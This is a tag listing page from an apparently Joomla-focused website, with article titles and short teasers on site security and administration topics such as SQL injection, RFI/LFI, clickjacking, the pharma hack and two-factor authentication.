2. Home
  3. Tags
  4. Joomla 1.0

security

  • My MySQL database does not support UTF-8! Do I have a problem?

    If you search for the title of this tip you will found lot of hits. Actually, my last search returned 6.6 millions of hits! Apparently lot of people are having with - or has fears on this subject. When I first published this tip, back in 2005, there was no such amount of answers/references, and I think, that this real flood of sites about this potential issue is not because lot of people would having problems, but because more and more people are getting into building interactive sites.

    So, do You have problems?
  • Other usual hacker tactics

    There are numerous other tactics that can be used to break into a computer system, and these usually involve discovering weaknesses or loopholes in the server software's defenses. When a programmer writes software that runs on a web server, he tries to make sure that the software cannot be abused - but it can be very difficult to foresee every eventuality; vandals and hackers are always pushing software to the limit and trying out operations which the software was not designed to handle, in an attempt to discover a way in.
  • Password strenght checker - for free!

    It's one of besk keept "secrets" of Joomla 2.5+ - there is a built in password strenght meter, ready to be used. And some are selling for good money - and others offering free plugins - to let you unleash the hidden power. 

    But if you aren't afraid to make your hands dirty with some PHP code, here is how you can do this:
  • Patch your outdated Joomla installs

    As I write this, both Joomla 1.5 and 2.5 have reached their EOL (End Of Life) for long time, and are not developed or supported anymore. This is a huge security risk, so the best advice here is to upgrade your Joomla site to the latest version. But what if you don't have the time/funds to do it right now?
  • Protect yourself from clickjacking hack

    Clickjacking is a browser security issue and is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function. The hacker installs an invisible layer over the existing site, hijacking the user's clicks. The suspicious-less user will perform this way actions they never intended to, from apparently inoffensive ones, as following someone on Twitter, to really nasty things, like password, credit card information theft, and anything else you might (not want to) do on a webpage.
  • reCaptcha stopped working

    While working on a new site I discovered, that reCaptcha - which used to be a rock solid part of the CMS since Joomla 1.7 - stopped working. Spent couple of hours googling around and checking and double-checking settings, just to discover, that Google, in his infinite wisdom, has changed things again without notice. The problem affects all Joomla versions from 1.7.1 to 3.2.0.
  • Register Globals

    Many of you probably had seen already the red warning in Joomla's admin interface, that you need to have the Register Globals set to "on", otherwise your site is exposed to security treats.

    And also many of you haven't a clue how to do it...

    So, let's see what an average webmaster can do about this problem.
  • RFI/LFI

    Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. His pair, Local File Inclusion or LFI is basically the same technique, used on sites which have been successfully penetrated, and the hacker "planted" his files already on the server.
  • Secure your standalone scripts used in a Joomla site

    Joomla has everything you may need. Right? If you take a look to the Joomla Extensions site, you may agree with this. But, as always, there may be cases, when the above statement is wrong. For specific need he simplest approach may be to use for specific purposes a standalone script. You can solve the problem - apparently - by using Joomla's wrapper feature, and use your scripts as they where part of your Joomla site. Almost perfect solution you may think... but your scripts are directly accessible by their physical URL, not only through the Joomla interface. What you can do about?

    A lot. And surprisingly easily.
  • Server Settings

    Joomla specifies certain settings that are recommended for proper functioning of the system. A list of the recommended and actual settings is displayed when you install Joomla. One of the recommended settings is to have 'Display Errors' switched on. This is very useful when developing and debugging a site, but there is a security vulnerability in PHP (not Joomla, but the language in which Joomla was written) which may allow cross-site-scripting attacks when the display errors option is enabled, if you have a script which produces an error.
  • Special considerations to make your Joomla site secure

    Joomla, as most CMS's excells by making it easy to manage a website page. Offers a pretty easy way to manage Web-based publishing, format management, history editing and version control, indexing, search, and retrieval. Joomla has an impressive suite of features, but these features require some special considerations.
  • SQL Injection

    One popular and potentially devastating method of attack against Joomla powered sites is SQL injection. Any web application that makes use of a database usually communicates with the database for necessary functions using a special language known as 'Structured Query Language', or SQL. Joomla, by the way, uses an open source implementation of this language, MySQL.
  • Sucuri's Hacked Website Report 2017

    The most comprehensive analysis of trends in the website security finally is out. There are couple of interesting fact worth highlighting.

    Most important is something we expected: Joomla is emerging as the most secure CMS.
  • The pharma hack

    The Paharma Hack (or Blackhat SEO Spam Hack) is a very elaborated hack wich is often unobserved for the regular visitors - and website owners - because does an ingenious trick: present a different version of your site for the searchengine bots. The site, for a long period of time looks and behaves normally for the regular visitors. This attack is very interesting because it is not visible to the normal user and the spam (generally about Viagra, Nexium, Cialis, etc) only shows up if the user agent is from Google’s crawler (googlebot). Also, the infection is a bit tricky to remove and if not done properly will keep reappearing. It's one of nastiest hacks you might have. We recommend hiring a specialist to remove it, because generally the infection reappears in no time after the site is "cleaned".
  • Two-factor authentication

    Also known as two step-authentication or two-step verification, two-factor authentication is an additional security option for online accounts to help keep them safe.
  • Unresponsive WYSIWYG editor

    The WYSIWYG editors are great additions to the Joomla, and we have lots of them around. They make a webmaster from casual user and can speed up the work of pros. But, sometimes, you find that you cannot enter text into the HTML editor, or click on the HTML editor's toolbar buttons - you are locked out of editing your content!

    What can be more annoying as being unable to edit your own site?
  • User groups

    By default, across all Joomla versions from Joomla 1.0, through Joomla 1.5, Joomla 1.6 to the Joomla 1.7 the basic structure of default user groups is unchanged. The users are generally sorted in 3 main categories, the unregistered/not logged in users, the registered users with frontend only access and the backend users. The exact naming of these main groups are varying across the different Joomla versions, but the default end level groups are the same. The groups and their core permissions are as follows:
  • Virtual spring cleaning for your Joomla sites

    Websites take maintenance, and making a habit of performing a little spring cleaning each year can keep a business website running smoothly. The tips below does not apply for Joomla sites alone, any site can benefit from most of these tricks and tips.
  • Vulnerable extensions list

    Even most of security-conscientious Joomla webmasters aren't knowing the existence of this list, maintained at Joomla docs site. There are listed all components with known security problems, and very important to know, the items once appeared on the list aren't removed when the problem is fixed, because large majority of Joomla webmasters aren't upgrading their site as new versions are coming out for the add-ons used. So worth checking, even if the components you use are listed on GREEN - aka fixed -, you may run in trouble, because hackers are knowing the list - and are pro-actively seeking Joomla sites using the insecure add-ons. So you will become easily a target even if you have the secure version...

    Bookmark this link!

    Vulnerable extensions list
  • When the Joomla site is offline, only Super Users can log in

    A client of mine asked this question: "How can I allow registered users to log in and see the site even in offline mode, without giving them Super user privileges?"

Page 3 of 4